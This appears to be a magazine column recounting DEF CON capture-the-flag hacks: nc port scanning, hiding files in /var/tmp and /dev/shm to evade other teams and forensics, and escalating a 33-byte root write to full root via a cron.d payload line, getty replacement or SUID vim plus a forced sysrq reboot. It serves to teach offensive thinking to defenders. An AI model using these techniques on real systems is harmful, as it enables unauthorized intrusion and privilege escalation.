Hack and / - Some Hacks from DEF CON
Another incredibly useful function of nc is as a port scanner when something more sophisticated isn't around. Just use the -z option to have nc report only whether a port is open rather than sending it any data, add -v for verbose output, and provide a port range as an argument. So to scan a host for open ports between 20 and 25 (good for testing for open FTP, telnet, SSH and SMTP services), you would type:
$ nc -zv host.example.org 20-25
nc: connect to host.example.org port 20 (tcp) failed: Connection refused
Connection to host.example.org 21 port [tcp/ftp] succeeded!
Connection to host.example.org 22 port [tcp/ssh] succeeded!
nc: connect to host.example.org port 23 (tcp) failed: Connection refused
nc: connect to host.example.org port 24 (tcp) failed: Connection refused
Connection to host.example.org 25 port [tcp/smtp] succeeded!
Another interesting point in the competition involved a system you could log in to, but where a number of directories, including the home directory, were mounted read-only over NFS. This presented an interesting set of limitations. For instance, because the machine was being attacked by multiple teams who each could log in as the same user, everyone was kicking everyone else off the machine. That meant every time you wanted to log in, you had to type the password manually, yet because the home directory was read-only, you couldn't automate the process with SSH keys. It also meant you needed to be creative about where you stored your scripts, as you couldn't write to the directories your user normally had access to.
For the defender, you can see why mounting sensitive directories read-only over NFS presents a problem for attackers: they can't write to those directories as ordinary users, and even if they become root, they might have to exploit the NFS server itself to remount the filesystem read-write. As an attacker, that just meant being a bit more creative about where you store your files.
Most command-line users are aware of the existence of the /tmp directory on a Linux system. This is a directory to which all users can write, and a special permission (the sticky bit) is set on it so that although anyone can create files there, users can't delete or rename files owned by someone else. When hacking this particular restricted system, you could very well store your scripts in /tmp, but that's the first place other teams would look for your files, and they would likely delete them (bad) or modify them to do something you didn't expect (worse). Luckily, there are at least two other, less-well-known directories on a Linux system that are writable by everyone: /var/tmp and /dev/shm.
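You can see the sticky bit for yourself; here is a quick sketch (assuming a typical Linux system with GNU coreutils):

```shell
# /tmp's mode is 1777: world-writable (777) plus the sticky bit (1),
# shown as a trailing "t" in ls output (drwxrwxrwt).
ls -ld /tmp
stat -c '%a %n' /tmp

# The same restriction can be applied to any directory you own:
d=$(mktemp -d)
chmod 1777 "$d"
stat -c '%a' "$d"    # prints the octal mode: 1777
rm -rf "$d"
```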
The /var/tmp directory serves much the same function as /tmp does in that all users and programs can write to it; however, unlike the /tmp directory, many users are unaware that it exists or forget to look there. Also unlike the /tmp directory, which gets erased when the system reboots, any files you put in /var/tmp persist between reboots.
The /dev/shm directory is also a hacker favorite, and for good reason: even fewer administrators realize it is world-writable. An even better reason for an attacker to use this directory is that its contents are stored only in RAM (it is a tmpfs mount), not on disk, so once the system reboots, the files are gone, and not even forensic techniques can recover them.
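Both properties are easy to confirm from a shell; a quick sketch (filesystem type names are as reported by GNU stat):

```shell
# All three directories are world-writable with the sticky bit set
# (mode 1777), just like /tmp.
stat -c '%a %n' /tmp /var/tmp /dev/shm

# /dev/shm is backed by RAM: stat -f reports its filesystem type as
# tmpfs, while /var/tmp normally sits on a disk-backed filesystem,
# which is why files there survive reboots.
stat -f -c '%T %n' /dev/shm
```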
At a particular point in the competition, some smart hackers on the neg9 team discovered a fault in a custom service running as root on one of the competition systems. They were able to turn this flaw into a root exploit that allowed them to write 33 bytes as root anywhere on the filesystem they wanted. The tricky part was that if they chose an existing file, it would be truncated and replaced with those 33 bytes.
This presents an interesting problem: if your only root access were the ability to write 33 bytes to a file, how would you convert that into full root access? You might, for instance, write a new file into /etc/cron.d/ that executes an exploit script every minute. But what would you do if that didn't work? When you put yourself in an offensive mindset in a restricted environment like that, you end up discovering creative ways to approach a system.
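The cron.d idea needs only a one-line file; here is a hedged sketch (the payload path and cron filename are hypothetical, and the demo writes to a temp file rather than /etc/cron.d, which would require the root-write primitive):

```shell
# A file in /etc/cron.d uses the system crontab format, which adds a
# user field between the schedule and the command. This one-liner runs
# a (hypothetical) payload script every minute as root -- and at 25
# bytes including the trailing newline, it fits the 33-byte limit.
line='* * * * * root /tmp/x.sh'
demo=$(mktemp)                  # in the real attack: /etc/cron.d/x
echo "$line" > "$demo"
cat "$demo"
rm -f "$demo"
```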
There were a few ways you could exploit this flaw to get full root access. You could, for instance, look in /etc/inittab to see which getty process was set to auto-respawn and then replace the existing getty binary (for instance, /sbin/agetty) with your custom 33-byte shellcode. Then, when getty respawned (which you potentially could force), it would respawn as root, and you'd have your custom code running with root permissions.
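An /etc/inittab respawn entry of the kind described looks like this (a sysvinit-era example; the runlevels and getty path vary by distribution):

```
# /etc/inittab: init respawns this process whenever it exits, always
# as root -- so replacing /sbin/agetty with attacker code means init
# itself keeps re-launching the payload with root privileges.
1:2345:respawn:/sbin/agetty 38400 tty1
```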
The way the team exploited the flaw was to write a new short init script that made vim SUID root. Then, they wrote to a file in /proc that forced the system to reboot, so that upon the reboot, their init script would run. With vim set to SUID root, they could edit root-owned files and do things like change root's password and enable root logins with SSH and finally undo the SUID permissions on vim. From a defender's point of view, this kind of attack is quite tricky to protect against and essentially comes down to basic security practices, such as keeping packages up to date and putting services in sandboxes when possible.
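The SUID trick boils down to a single chmod plus the forced reboot; a sketch that demonstrates the permission change on a harmless copy (the real commands are shown only as comments, since they require root and the sysrq write reboots the machine immediately):

```shell
# Mode 4755 is the setuid bit (4) plus rwxr-xr-x (755). When root owns
# a 4755 binary, anyone who runs it gets root's effective UID -- which
# is why a SUID vim lets an ordinary user edit root-owned files.
cp /bin/true /tmp/demo-suid
chmod 4755 /tmp/demo-suid
stat -c '%a' /tmp/demo-suid    # prints: 4755
rm -f /tmp/demo-suid

# What the team's init script actually did (root only; the second
# command reboots without syncing, so these stay commented out):
#   chmod 4755 /usr/bin/vim
#   echo b > /proc/sysrq-trigger
```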
All in all, I have to say, I rather enjoyed this different perspective on security. Whether you are a sysadmin who stays on the defensive side or a hacker who thinks in offensive terms, I think both sides can benefit from putting on the other's hat every now and then.
Kyle Rankin is a Systems Architect in the San Francisco Bay Area and the author of a number of books, including The Official Ubuntu Server Book, Knoppix Hacks and Ubuntu Hacks. He is currently the president of the North Bay Linux Users' Group.